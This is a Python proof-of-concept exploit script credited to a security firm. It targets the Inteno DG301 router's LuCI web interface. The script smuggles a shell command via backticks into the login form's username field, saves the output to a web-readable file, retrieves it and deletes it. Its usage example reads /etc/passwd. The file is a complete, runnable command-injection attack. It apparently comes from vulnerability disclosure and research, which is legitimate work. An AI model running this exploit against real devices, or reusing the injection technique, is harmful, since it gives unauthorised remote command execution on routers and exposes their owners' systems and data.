#!/usr/bin/python
################################################################ # # # Inteno DG301 Command Injection PoC # # # # Vulnerable version: Powered by LuCI Trunk (inteno-1.0.34) # # OpenWrt Backfire 10.03.1-RC6 # # # # Written by Juan J. Guelfo @ Encripto AS # # post@encripto.no # # # # Copyright 2014 Encripto AS. All rights reserved. # # # # This software is licensed under the FreeBSD license. # # http://www.encripto.no/tools/license.php # # # ################################################################
import sys, getopt, urllib, urllib2
__version__ = "0.1" __author__ = "Juan J. Guelfo, Encripto AS (post@encripto.no)"
# Prints title and other header info def header(): print "" print " ================================================================= " print "| Inteno DG301 v1.0.34 Command Injection PoC \t\t\t |".format(__version__) print "| by {0}\t\t |".format(__author__) print " ================================================================= " print "" # Prints help def help(): header() print """ Usage: python Inteno-DG301-PoC.py [mandatory options]
Mandatory options: -t target ...Target IP address -p port ...Port where the HTTP admin interface is listening on -c cmd ...Command to inject Example: python Inteno-DG301-PoC.py -t 192.168.1.1 -p 80 -c "cat /etc/passwd" """ sys.exit(0) if __name__ == '__main__': #Parse options try: options, args = getopt.getopt(sys.argv[1:], "t:p:c:", ["target=", "port=", "cmd="])
except getopt.GetoptError, err: header() print "\n[-] Error: {0}.\n".format(str(err)) sys.exit(1)
if not options: help()
target = None port = None cmd = None reset = None for opt, arg in options: if opt in ("-t"): target = arg if opt in ("-p"): port = arg if opt in ("-c"): cmd = arg #Option input validation if not target or not port or not cmd: help() print "[-] Error: Incorrect syntax.\n" sys.exit(1)
header() print "[*] Trying to connect to {0}:{1}...".format(target, port) headers = { "User-Agent" : "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"}
try: # Inject command print "[*] Sending command: {0}".format(cmd) data = "username=user`"+ urllib.quote(cmd) + "%20>%20/www/poc.txt`&password=pass" r = urllib2.Request("http://%s:%s/cgi-bin/luci" % (target, port), data, headers) results = urllib2.urlopen(r).read() # Retrieve results r = urllib2.Request("http://%s:%s/poc.txt" % (target, port), None, headers) results = urllib2.urlopen(r).read() # Show results print "[+] Retrieving results...\n" print results # Clean output file data = "username=user`rm%20/www/poc.txt`&password=pass" r = urllib2.Request("http://%s:%s/cgi-bin/luci" % (target, port), data, headers) results = urllib2.urlopen(r).read() print "[*] Cleaning up...\n"
except urllib2.URLError: print "[-] Error: The connection could not be established.\n" except IOError as e: print "[-] Error: {0}...\n".format(e.strerror)
sys.exit(0)
|